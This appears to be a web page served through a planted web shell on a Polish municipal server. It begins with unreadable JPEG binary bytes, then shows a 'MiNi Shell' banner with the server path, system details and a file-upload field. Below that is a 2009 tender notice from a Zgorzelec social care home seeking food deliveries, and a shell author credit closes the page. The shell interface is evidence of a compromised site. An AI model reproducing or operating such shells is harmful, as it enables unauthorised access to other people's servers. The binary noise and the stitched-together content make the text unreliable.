JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/60826-N-2009.html

<p class="kh_header"><b>Zgorzelec: Dostawy żywności na potrzeby Domu Pomocy Społecznej Ostoja</b><br>
<b>Numer ogłoszenia: 60826 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Ostoja" , ul. Pułaskiego 11-13, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7752580 w. 20, faks 075 7752580.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządowa - Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy żywności na potrzeby Domu Pomocy Społecznej Ostoja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje cykliczne dostawy żywności na potrzeby stołowki DPS.
Zamówienie podzielone jest na 5 części - pakietów. Wykonawcy mogą złożyć oferty na dowolnie wybrane pakiety od 1 do 5
Pakiet nr 1
  Produkty mleczarskie 
  Oleje i tłuszcze zwierzęce lub roślinne
Pakiet nr 2
 Produkty spożywcze
 Produkty przemiału ziarna, skrobi i produktów skrobiowych
Owoce, warzywa i podobne produkty
Pakiet nr 3
 Pieczywo
Pakiet nr 4
 Rośliny uprawne, produkty warzywnictwa i ogrodnictwa
 Jaja
Pakiet nr 5
Ryby 
Zakres zamówienia obejmuje:
Pakiet nr 1 
Mleko 2%
1 l w folii	l	12.500		
Śmietana 30%
0,20l	l	50		
Śmietana 18%
0,40l	l	400		
Masło extra
250g	kg	1050		
Ser żółty  Salami , Gołda lub równoważny	Kg	550		
Ser topiony kremowy 40% 100g	kg	500		
Ser topiony krążek 200g	kg	400		
Twaróg półtłusty pergamin 
1kg	kg	600		
Kefir w butelce 430 ml	szt.	550		
Margaryna mleczna
250 g	kg	200		
Olej do smażenia uniwersalny 1l	Szt.	750		
Jogurt owocowy 115 g	Szt.	2900		
Jogurt
naturalny 
135 g	Szt.	2900	
Pakiet nr 2:
Zupa pieczarkowa Winiary lub równowazna 65g	Szt.	250
Zupa ogonowa Winiary lub równoważna 41g	Szt.	400
Cukier kg	Kg	1600
Herbata 100g	Szt.	750
Kawa zbożowa
Kujawianka 500g	Szt.	180
Kawa zbożowa
INKA 150g	Szt,	25
Kakao 200g	Szt.	30
Suchary 300g	Op.	100
Krakersy 180g	Op.	350
Herbatniki 80g	Op.	1000
Biszkopty 120g	Op.	800
Budyń 60g	Szt.	300
Kisiel 77g	Szt.	300
Ketchup łagodny 500g	Szt.	350
Sól kg	kg	300
Zupa gulaszowa 60g	.Szt.	200
Przyprawa do zup Vegeta lub równoważna
200g	Szt.	120
Przyprawa do zup w płynie 1l	Szt.	240
Musztarda  kozacka lub równoważna 280g	Szt.	180
Ocet spirytusowy
10% 0.5l	Szt.	20
Cynamon 20g	Szt.	50
Cukier waniliowy 32g	Szt.	250
Kwasek cytrynowy 20g	Szt.	700
Liść laurowy 
10g	Op.	250
Majeranek 10g	Op.	600
Papryka w proszku  słodka 20g	Op.	600
Pieprz naturalny 20g	Op.	700
Pieprz ziołowy 20g	Op.	350
Proszek do pieczenia 36g	Op.	60
Soda oczyszczona 40g	Op.	30
Ziele angielskie 20g	Op.	250
Bazylia 10g	Op.	150
Przyprawa prowansalska 10g	Op.	100
Tymianek10g	Op.	150
Żelatyna 20g	Op.	120
Przyprawa piernikowa 20g	Op.	20
Majonez  400ml	Szt.	200
Zupa cebulowa 31g	Szt.	100
Miód 400g	Szt.	25
Wiórki kokosowe 100g	Szt.	100
Oregano 
10g	Szt.	150
Herbata ekspresowa LIPTON lub równoważna
100 saszetek	Szt.	12
Papryka ostra 20g 	Szt..	40
Mąka poznańska 
1 kg	kg	200
Mąka tortowa
1 kg	kg.	550
Mąka ziemniaczana
0,5kg	kg	50
Kasza gryczana 
0,5 kg	kg	250
Kasza jęczmienna 0,5kg	kg	500
Kasza manna błyskawiczna 0,4 kg	kg	250
Ryż 1 kg	kg	550
Płatki owsiane0,5kg	kg	200
Płatki jęczmienne0,5kg	kg	150
Płatki kukurydziane250g	kg	30
Cukier puder 400g	kg.	40
Kasza kukurydziana 0,5kg	kg	150
Aromaty do ciast 6ml	Szt.	60
Galaretka owocowa 79g	Szt	60
Fasolka 
szparagowa
konserwowa 500g	Szt	400
Kukurydza konserwowa 400g	Szt	150
Groszek konserwowy 400g	Szt	400
Chrzan konserwowy 320g	Szt	120
Koncentrat pomidorowy 900g
	Szt	120
Koncentrat pomidorowy 200g 	Szt	150
Powidła 310g	Szt	100
Dżem truskawka, wiśnia, leśne 
310g	Szt	700
Marmolada wieloowocowa 500g	Szt	40
Syrop  Paola lub równoważny 330ml	Szt	2200
Kapusta kwaszona	kg	1000
Ogórek kwaszony	kg	500
Pieczarka konserwowa
 720ml	Szt.	80
Ananas w puszce
0,565kg	Szt,	50
Brzoskwinia w puszce 0,820kg	Szt.	100
Ogórek konserwowy
0,9 l	Szt	800
Kompot truskawka, wiśnia 0,9l	Szt	1200
Papryka konserwowa
0,9kg	Szt	250
Szczaw konserwowy
0,280 kg	Szt	150
Rodzynki 200g 	kg	10
Sos pieczarkowy Winiary lub równoważny 34g	Szt	100
Sos myśliwski Winiary lub równoważny 33g	Szt.	100
Sos pomidorowo-paprykowy 44g	Szt.	60
Zupa Żurek Winiary lub równoważna 51g	Szt.	200
Pomidory w puszce bez skórki 900g	Szt.	100
Koncentrat barszczu 0,33ml	Szt.	100
Ocet winny 0,5l	Szt.	20
Ogórek kwaszony 0,5kg 	Szt.	100
Przecier ogórkowy 0,3 l	Szt.	120
Przyprawa do ryb 20g	Szt.	60
Woda mineralna Żywiec lub równoważna 0,5l	Szt.	250
Fasola Jaś
0,5 kg op.	kg	130
Fasola drobna
0,5 kg op.	kg	80
Groch łuskany 
O,5 kg op.	kg	100
Pakiet nr 3:
Chleb mieszany 600g	Szt.	10.500
Chleb razowy z dodatkami 500g	Szt.	2.000
Bułka pszenna 400g	Szt.	100
Bułka drożdżowa 100g	Szt.	2.000
Rogal maślany 70g 	Szt.	2.000
Bułki zwykłe 50g	Szt.	30.000
Bułki maślane 70g	Szt.	2.000
Bułka graham 100g	Szt	1.500
Bułka kajzerka 50g	Szt	2.000
Bułka tarta 
0,5kg	Kg	150
Drożdże 
0,5 kg	Szt	12
Pączki	Szt.	1000
Bułka drożdżowa z budyniem i jabłkami	Szt.	1500
Pakiet nr 4:
Marchew	kg	2500
Pietruszka korzeń	kg	550
Pietruszka natka	pęczek	1500
Seler korzeń	kg	900
Por	kg	150
Burak czerwony	kg	2500
Rzepa biała	kg	100
Cebula	kg	700
Kapusta biała	kg	800
Kapusta włoska	kg	150
Kapusta czerwona	kg	200
Kapusta pekińska	kg	400
Ogórki zielone	kg	500
Cukinia	kg	150
    Kabaczek	Kg	100
Pomidory	kg	1000
Papryka zielona	kg	300
Papryka żółta	kg	200
Papryka stożkowa	kg	400
Papryka czerwona	kg	150
Koper	pęczek	800
Szczypior	pęczek	800
Sałata	Szt.	500
Rzodkiewka	pęczek	250
Pieczarki	kg	200
Jabłka	kg	1700
Mandarynka	kg	150
Banany	kg	200
Pomarańcze	kg	200
Cytryny	kg	400
Ziemniaki	kg	17000
Czosnek	kg	25
Kalafior	szt	300
Mak 400g opak.	kg	12
Jaja świeże klasa M 53-63 g 	szt	6000
Botwinka	szt.	250
Brokuł	szt.	150
Truskawki	kg	250
Pakiet nr 5:
Filet mrożony z Morszczuka	kg	150
Morszczuk w pomidorach 240g	puszka	200
Filet z Morszczuka w oleju 240g	puszka	120
Filet mrożony z Mintaja	kg	150
Filet mrożony z Pangi	kg	200
Sledź Matyjas	kg	100
Filety śledziowe w pomidorach 240g	szt	100
Filety śledziowe w oleju 240g	szt	100
Makrela wędzona	kg	150.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 15.80.00.00-6, 01.10.00.00-8, 01.20.00.00-9, 05.10.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy składający ofertę powinni spełniać poniższe warunki udziału w postępowaniu zgodnie z art.22 ust.1 pkt.1 do 4 ustawy oraz na potwierdzenie ich spełnienia złożyć poniższe oświadczenia i dokumenty zgodnie z art.25 i 26 ust.2 ustawy Pzp
1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
-Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
-Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
-Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
- Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia
 Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, poprzez zastosowanie kryterium -spełnia/nie spełnia tj. zgodnie z zasadą czy dokumenty zostały załączone do oferty i czy spełniają określone  wymagania Brak któregokolwiek dokumentów .oświadczeń lub złożenie ich w niewłaściwej formie będzie skutkował wykluczeniem Wykonawcy na mocy art.24 ust.2 pkt.3 ustawy z zastrzeżeniem art.26 ust.3 ustawy i odrzucony na mocy art.89 ust.1 ustawy
 Zamawiający dokona oceny ofert i wyboru najkorzystniejszej oferty spośród ofert złożonych przez Wykonawców nie wykluczonych z postępowania oraz ofert nie odrzuconych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
   A.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
A.2. Dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
  A.3. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych  oraz , że wykonawca nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.1-10 Prawa zamówień publicznych
B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
B.1 Wykaz Odbiorców adres i telefon dostaw o charakterze zbliżonym do zadania ofertowego
  C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
   C.1 -Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
D.1 Zamiast dokumentów, o których mowa w pkt.
 A.1. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1. nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. D
E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
W przypadku, kiedy ofertę składa kilka podmiotów, oferta tych wykonawców musi spełniać następujące warunki:
1. Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub upoważnionego - partnera wiodącego.
2. Upoważnienie do pełnienia funkcji przedstawiciela -partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie- partnerów - należy załączyć do oferty
3. Przedstawiciel  -wiodący partner -winien być upoważniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań
W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie przed przystąpieniem do zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. A.1, A.3,  C.1 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   
F. Postanowienia dotyczące składanych dokumentów F.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem  za zgodność z oryginałem/ F.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.zgorzelec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Ostoja
ul. Pułaskiego 11-13
59-900 Zgorzelec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 10:00, miejsce: Dom Pomocy Społecznej Ostoja
ul. Pułaskiego 11-13
59-900 Zgorzelec
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com